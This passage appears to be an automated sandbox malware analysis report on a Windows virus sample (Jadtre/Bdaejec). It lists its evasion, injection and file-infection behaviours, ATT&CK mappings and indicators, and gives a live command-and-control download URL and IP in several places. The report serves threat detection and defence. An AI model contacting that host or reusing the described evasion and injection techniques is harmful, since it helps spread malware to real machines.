    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\ib.exeCode function: GetForegroundWindow,GetWindowThreadProcessId,CreateThread,CloseHandle,Sleep,?_Xlength_error@std@@YAXPBD@Z,OpenProcess,K32GetProcessImageFileNameA,strstr,K32EnumProcessModulesEx,K32GetModuleFileNameExA,StrStrIA,Sleep,?_Xbad_function_call@std@@YAXXZ,0_2_003E2510
    Source: C:\Users\user\Desktop\ib.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-1268
    Source: C:\Users\user\Desktop\ib.exeStalling execution: Execution stalls by calling Sleepgraph_0-1129
    Source: C:\Users\user\Desktop\ib.exeWindow / User API: threadDelayed 1945Jump to behavior
    Source: C:\Users\user\Desktop\ib.exeWindow / User API: threadDelayed 3716Jump to behavior
    Source: C:\Users\user\Desktop\ib.exeWindow / User API: foregroundWindowGot 1758Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-874
    Source: C:\Users\user\Desktop\ib.exe TID: 6196Thread sleep time: -3716000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\ib.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\ib.exeThread sleep count: Count: 1945 delay: -3Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00CB1754h2_2_00CB1718
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_00CB29E2
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00CB2B8C
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.2.drBinary or memory string: VMware
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: ib.exe, 00000000.00000002.4134137721.00000000009FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Amcache.hve.2.drBinary or memory string: vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeAPI call chain: ExitProcess graph end nodegraph_2-847
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003E31A6
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E9044 mov eax, dword ptr fs:[00000030h]0_2_003E9044
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E3308 SetUnhandledExceptionFilter,0_2_003E3308
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003E31A6
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E2CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003E2CCC

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E22C0 OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,GetLastError,GetLastError,_printf,WaitForSingleObject,CloseHandle,0_2_003E22C0
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event,0_2_003E1670
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event,0_2_003E1670
    Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E3444 cpuid 0_2_003E3444
    Source: C:\Users\user\Desktop\ib.exeCode function: 0_2_003E3096 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_003E3096
    Source: C:\Users\user\AppData\Local\Temp\hjErac.exeCode function: 2_2_00CB139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_00CB139F
    Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    21
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    21
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts12
    Process Injection
    12
    Virtualization/Sandbox Evasion
    LSASS Memory321
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    1
    Access Token Manipulation
    Security Account Manager12
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
    Process Injection
    NTDS1
    Process Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
    Obfuscated Files or Information
    LSA Secrets1
    Application Window Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain Credentials3
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync13
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542812 Sample: ib.exe Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 30 ddos.dnsnb8.net 2->30 36 Suricata IDS alerts for network traffic 2->36 38 Antivirus detection for dropped file 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 8 other signatures 2->42 8 ib.exe 2 2->8         started        signatures3 process4 dnsIp5 32 127.0.0.1 unknown unknown 8->32 22 C:\Users\user\AppData\Local\Temp\hjErac.exe, PE32 8->22 dropped 44 Found stalling execution ending in API Sleep call 8->44 46 Found API chain indicative of sandbox detection 8->46 48 Contains functionality to inject threads in other processes 8->48 50 Contains functionality to compare user and computer (likely to detect sandboxes) 8->50 13 hjErac.exe 14 8->13         started        18 conhost.exe 8->18         started        file6 signatures7 process8 dnsIp9 34 ddos.dnsnb8.net 44.221.84.105, 49730, 799 AMAZON-AESUS United States 13->34 24 C:\Program Files\7-Zip\Uninstall.exe, PE32 13->24 dropped 26 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 13->26 dropped 28 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 13->28 dropped 52 Antivirus detection for dropped file 13->52 54 Multi AV Scanner detection for dropped file 13->54 56 Detected unpacking (changes PE section rights) 13->56 58 2 other signatures 13->58 20 WerFault.exe 21 16 13->20         started        file10 signatures11 process12

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    ib.exe95%ReversingLabsWin32.Virus.Jadtre
    ib.exe100%AviraW32/Jadtre.B
    ib.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\hjErac.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\hjErac.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\hjErac.exe97%ReversingLabsWin32.Trojan.Skeeyah
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://upx.sf.net0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://ddos.dnsnb8.net/cHhjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
            unknown
            http://www.rftp.comJosiahSciTE.exe.2.drfalse
              unknown
              http://www.activestate.comSciTE.exe.2.drfalse
                unknown
                http://www.activestate.comHolgerSciTE.exe.2.drfalse
                  unknown
                  http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEhjErac.exe, 00000002.00000003.1687849172.0000000000830000.00000004.00001000.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpfalse
                    unknown
                    http://upx.sf.netAmcache.hve.2.drfalse
                    • URL Reputation: safe
                    unknown
                    http://www.rftp.comSciTE.exe.2.drfalse
                      unknown
                      http://www.baanboard.comBrendonSciTE.exe.2.drfalse
                        unknown
                        http://ddos.dnsnb8.net:799/cj//k1.rarGsfhjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://www.smartsharesystems.com/SciTE.exe.2.drfalse
                            unknown
                            http://www.scintilla.orgSciTE.exe.2.drfalse
                              unknown
                              http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
                                unknown
                                http://ddos.dnsnb8.net:799/cj//k1.rarGvhjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
                                    unknown
                                    http://www.develop.comSciTE.exe.2.drfalse
                                      unknown
                                      http://www.lua.orgSciTE.exe.2.drfalse
                                        unknown
                                        http://ddos.dnsnb8.net/hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k1.rarRhjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://ddos.dnsnb8.net:799/cj//k1.rarqhjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.spaceblue.comSciTE.exe.2.drfalse
                                                unknown
                                                http://ddos.dnsnb8.net:799/cj//k1.rarphjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.baanboard.comSciTE.exe.2.drfalse
                                                    unknown
                                                    http://www.develop.comDeepakSciTE.exe.2.drfalse
                                                      unknown
                                                      http://ddos.dnsnb8.net:799/cj//k1.rarghjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        44.221.84.105
                                                        ddos.dnsnb8.netUnited States
                                                        14618AMAZON-AESUStrue
                                                        IP
                                                        127.0.0.1
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1542812
                                                        Start date and time:2024-10-26 13:51:10 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 0s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:10
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:ib.exe
                                                        Detection:MAL
                                                        Classification:mal100.spre.troj.evad.winEXE@6/11@1/2
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 24
                                                        • Number of non-executed functions: 23
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: ib.exe
                                                        TimeTypeDescription
                                                        07:52:22API Interceptor1x Sleep call for process: WerFault.exe modified
                                                        07:52:35API Interceptor11499192x Sleep call for process: ib.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        44.221.84.105RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                        • jhvzpcfg.biz/qsmoxnmhx
                                                        samoanaliz-uroka-okruzhayuschij-mir-po-teme-kakie-byvayut-zhivotnye.exeGet hashmaliciousUnknownBrowse
                                                        • wxanalytics.ru/net.exe
                                                        balet-spyaschaya-krasavitsa.exeGet hashmaliciousUnknownBrowse
                                                        • wxanalytics.ru/net.exe
                                                        http://44.221.84.105Get hashmaliciousUnknownBrowse
                                                        • 44.221.84.105/favicon.ico
                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                        • neazudmrq.biz/yewbnslbiwmcquj
                                                        PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                        • banwyw.biz/wrjeoyp
                                                        nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                        • zrlssa.biz/rybtaabjv
                                                        tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                        • uphca.biz/hiqtpnauanelpf
                                                        RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                        • bumxkqgxu.biz/shs
                                                        SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                                                        • ddos.dnsnb8.net:799/cj//k1.rar
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ddos.dnsnb8.netSecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                                                        • 44.221.84.105
                                                        1hdqYXYJkr.exeGet hashmaliciousBdaejecBrowse
                                                        • 44.221.84.105
                                                        7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
                                                        • 44.221.84.105
                                                        BUG32.exeGet hashmaliciousBdaejecBrowse
                                                        • 44.221.84.105
                                                        7Y18r(212).exeGet hashmaliciousBdaejecBrowse
                                                        • 44.221.84.105
                                                        7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
                                                        • 44.221.84.105
                                                        A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                        • 44.221.84.105
                                                        BUG32.exeGet hashmaliciousBdaejecBrowse
                                                        • 44.221.84.105
                                                        builder_Release.exeGet hashmaliciousBdaejecBrowse
                                                        • 44.221.84.105
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AMAZON-AESUSla.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                        • 50.17.73.10
                                                        la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                        • 54.144.81.186
                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                        • 44.194.43.138
                                                        http://fleurifleuri.com/Get hashmaliciousUnknownBrowse
                                                        • 52.73.109.207
                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                        • 54.234.67.123
                                                        la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                        • 3.232.100.182
                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 52.72.187.220
                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                        • 100.29.92.175
                                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 3.232.195.24
                                                        http://www.wattpad.comGet hashmaliciousUnknownBrowse
                                                        • 54.86.240.225
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Local\Temp\hjErac.exeSecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                                                          8VB4lVuZk3.exeGet hashmaliciousBdaejecBrowse
                                                            biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                                                              biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                                                                #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                  a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                    1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                      log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                                                                        log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                                                                          2.exeGet hashmaliciousBdaejecBrowse
                                                                            Process:C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):19456
                                                                            Entropy (8bit):6.5911440658238485
                                                                            Encrypted:false
                                                                            SSDEEP:384:1FZSnXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:spQGPL4vzZq2o9W7GsxBbPr
                                                                            MD5:0BB59688EC3CF103657A0DB5E75075A0
                                                                            SHA1:1950DFC6118EEE13977464AA342264B0883DD8E9
                                                                            SHA-256:4DAB9C9680C0F8F3AD9842314AC752B154DC4D39F25EA4BD428A1C1C9B46E5D6
                                                                            SHA-512:0CAA686C7D8D82EAEAC8ADBB93B6BCC19375829649C691F07B5C3B7FF0FEFF5B680BFF983B84ED02A4C1879018CEC388FAB4E3BC60B1874905A5F61C9AD7F7F6
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
